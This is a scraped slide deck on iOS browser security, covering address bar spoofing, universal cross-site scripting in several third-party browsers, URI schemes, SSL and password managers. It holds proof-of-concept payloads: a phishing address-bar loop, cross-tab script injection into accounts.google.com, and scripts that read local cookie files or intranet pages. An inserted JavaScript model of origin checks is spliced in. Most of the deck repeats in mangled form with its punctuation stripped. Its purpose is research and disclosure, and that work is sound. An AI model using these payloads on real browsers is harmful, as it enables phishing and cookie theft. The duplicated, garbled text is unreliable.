Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS: Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users, bypassing the same-origin policy.
In UXSS the attacker exploits a vulnerability in the browser, not in the website.
(~ http://en.wikipedia.org/wiki/Cross-site_scripting)
Famous after the PDF UXSS in 2007
Universal Cross-Site Scripting
• CVE-2013-6893: UXSS in Mercury Browser for iOS
• CVE-2013-7197: UXSS in Yandex.Browser for iOS
• CVE-2012-2899: UXSS in Google Chrome for iOS
• …
CVE-2013-6893: UXSS in Mercury Browser
w = window.open('about:blank');
  -> mbexec$(WINDOW_ID)[ "command":"window.open", "target":1234, "url":"about:blank" ]   (target id from Math.random())
  -> [webView loadRequest: … "about:blank" …]
  (cross-frame forgery)
w.document.write('Hi');
  -> mbexec$(WINDOW_ID)[ "command":"window.document.write", "target":1234, "html":"Hi" ]
  -> [webView stringByEvaluatingJavaScriptFromString:@"document.write('Hi')"]
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls. Any at all.
w = window.open('https://accounts.google.com/'); w.document.write('<script src=…></script>');
… and it just works in accounts.google.com
CVE-2013-7197: UXSS in Yandex.Browser
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect the child window after window.open() -> UXSS
Bug Bounty :-)
CVE-2012-2899: UXSS in Google Chrome
• w = window.open(location.href); w.document.write('Hi');
• [webView loadHTMLString:@"Hi" baseURL:href]
• w = window.open('about:blank'); w.document.write(…);
• about:blank is kind of "no URL", right?
• [webView loadHTMLString:@"…" baseURL:nil]
• For baseURL = nil, UIWebView loads the document in the applewebdata:// origin. Same as file://: no same-origin policy, access to any web origin and to local files
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>');
• -> applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)
Bug Bounty :-)
Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi');
• [webView loadHTMLString:@"Hi" baseURL:[NSURL …@"about:blank"]]
• iOS 8: use the WKWebView UIDelegate method webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:
Other potential paths to the applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:@"http://example.com…"] -> nil (any string that is not a valid URL yields nil, i.e. baseURL:nil)
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com…"), NULL) -> NULL for the same reason
• Downloads opened directly from file://
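As an added example (not the slides' code and not any browser's), a JavaScript model of the native half of a cross-tab bridge such as the mbexec$ dispatcher shown for Mercury: the origin is recomputed from each tab's current URL on every document.write, and about:blank or a missing URL inherits the opener's origin instead of becoming a privileged "no URL" origin as with baseURL:nil. TabBridge, CheckAtOpenBridge, the method names and the hosts attacker.invalid and accounts.example are this example's own constructions.

```javascript
'use strict';
// Added example, not from the slides. Models the native half of a cross-tab JavaScript
// bridge (the mbexec$-style "window.open" / "window.document.write" dispatcher) and the
// origin check it must perform. Class, method and field names are hypothetical.

// Origin = scheme + host + port, the tuple the same-origin policy compares.
// Returns null for anything that is not an http(s) URL with a host: file://,
// applewebdata:// and malformed strings are opaque, so no cross-tab call ever matches them.
function originOf(url, openerOrigin) {
  if (url === null || url === undefined || url === '' || url === 'about:blank') {
    return openerOrigin;          // inherit the opener's origin, never "no URL"
  }
  const m = /^([a-z][a-z0-9+.-]*):\/\/([^\/:?#]+)(?::(\d+))?/i.exec(url);
  if (!m) return null;
  const scheme = m[1].toLowerCase();
  if (scheme !== 'http' && scheme !== 'https') return null;
  const host = m[2].toLowerCase();
  const port = m[3] || (scheme === 'https' ? '443' : '80');
  return scheme + '://' + host + ':' + port;
}

class TabBridge {
  constructor() {
    this.tabs = new Map();        // id -> { url, openerOrigin, html }
    this.nextId = 1;
  }
  addTab(url, openerOrigin = null) {
    const id = this.nextId++;
    this.tabs.set(id, { url, openerOrigin, html: '' });
    return id;
  }
  // A navigation or redirect inside the tab: only the current URL counts from now on.
  navigate(id, url) {
    this.tabs.get(id).url = url;
  }
  originOfTab(id) {
    const t = this.tabs.get(id);
    return originOf(t.url, t.openerOrigin);
  }
  // command "window.open" issued from tab `caller`
  open(caller, url) {
    return this.addTab(url, this.originOfTab(caller));
  }
  // command "window.document.write" from `caller` into `target`: re-check every time
  documentWrite(caller, target, html) {
    const src = this.originOfTab(caller);
    const dst = this.originOfTab(target);
    if (src === null || dst === null || src !== dst) {
      return { ok: false, reason: 'cross-origin write refused: ' + src + ' -> ' + dst };
    }
    this.tabs.get(target).html = html;
    return { ok: true };
  }
}

// The pattern behind CVE-2013-7197 as described on the slides: the origin is checked
// when the window is opened and the result is remembered, so a redirect of the child
// between window.open() and document.write() is never noticed.
class CheckAtOpenBridge extends TabBridge {
  open(caller, url) {
    const id = super.open(caller, url);
    const allowed = this.originOfTab(caller) !== null &&
                    this.originOfTab(caller) === this.originOfTab(id);
    this.tabs.get(id).writableBy = allowed ? caller : null;   // decided once, here
    return id;
  }
  documentWrite(caller, target, html) {
    if (this.tabs.get(target).writableBy !== caller) {
      return { ok: false, reason: 'not opened by caller' };
    }
    this.tabs.get(target).html = html;
    return { ok: true };
  }
}

// Constructed scenario: a page on attacker.invalid opens about:blank (same origin by
// inheritance), the child is then navigated to another site, and the opener writes again.
function redirectScenario(bridge) {
  const opener = bridge.addTab('http://attacker.invalid/');
  const child = bridge.open(opener, 'about:blank');
  const first = bridge.documentWrite(opener, child, 'Hi');
  bridge.navigate(child, 'https://accounts.example/login');
  const second = bridge.documentWrite(opener, child, '<script src="..."></script>');
  return { first: first.ok, second: second.ok };
}

console.log('re-check on every call:', redirectScenario(new TabBridge()));
console.log('check at open only    :', redirectScenario(new CheckAtOpenBridge()));
```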
Content-Disposition: attachment
• displayed in the origin of the hosting site (iOS < 5): CVE-2011-3426 (Christian Matthies, Yoshinori Oota)
• isolated attachment origin (iOS 5+)
• document.location.href
• document.referrer
• w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')
Content-Type
• text/plain -> rendered as HTML (iOS < 7): CVE-2013-5151 (Ben Toews)
• application/octet-stream -> rendered as HTML
• application/other with a filename ending in .html -> rendered as HTML
JS without Same-Origin-Policy
<script>
a = document.location.href.split('/');
if (a[0] === 'file:') {
  path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
  path = path + '/Library/Cookies/Cookies.binarycookies';
  x = new XMLHttpRequest(); x.open('GET', path, false); x.send();
  alert(x.responseText);
}
</script>
JS without Same-Origin-Policy
<script>
x = new XMLHttpRequest(); x.open('GET', 'https://your.intranet/', false); x.send();
alert(x.responseText);
</script>
Challenge: hijack password autofill
Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header, HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView configuration.preferences.javaScriptEnabled = false
Popups & URL handling: Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com">, <iframe src="merc://example.com"> etc. bypass all popup blockers anyway…
Popups & URL handling: URI schemes
Native (WebKit) / Application (bolted-on): Bridge (internal), Registered (external)
• scheme://download?https://secure.tld/victim/data vs. scheme://download?http://attacker.tld/README.html
• scheme://add-filter?url=…
CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a null pointer dereference
• Tested with percent encoding: http://%, http://%5, http://%5c etc.
• Example, Opera Coast: <script>document.location = 'http://%5c'</script>
Opera Coast:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()
• Special guest star: Safari on OS X Mavericks before Security Update 2014-02 (CVE-2014-1315)
<iframe src="lets-try-format-string:%p%p%p%p…">
SSL & password managers: SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 14 of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02)
Password managers
• JavaScript runs with the privileges of the top frame -> passwords are not filled for subframes
• Usually possible to force saving a password for another domain (with/without user interaction)
• Password filling checks the domain, but not always the URL scheme (https vs http)
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd-party iOS browsers are experimental or side projects, built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec
• http://www.w3.org/TR/CSP
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews
• http://www.shmoo.com/idn
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com
• https://ios.browsr-tests.com
Questions?
lukaszpilorz@runic.pl, pawelwylecial@gmail.com
Twitter: @runicpl, @h0wlu
Thank you
![Page 32: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/32.jpg)
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 33: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/33.jpg)
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
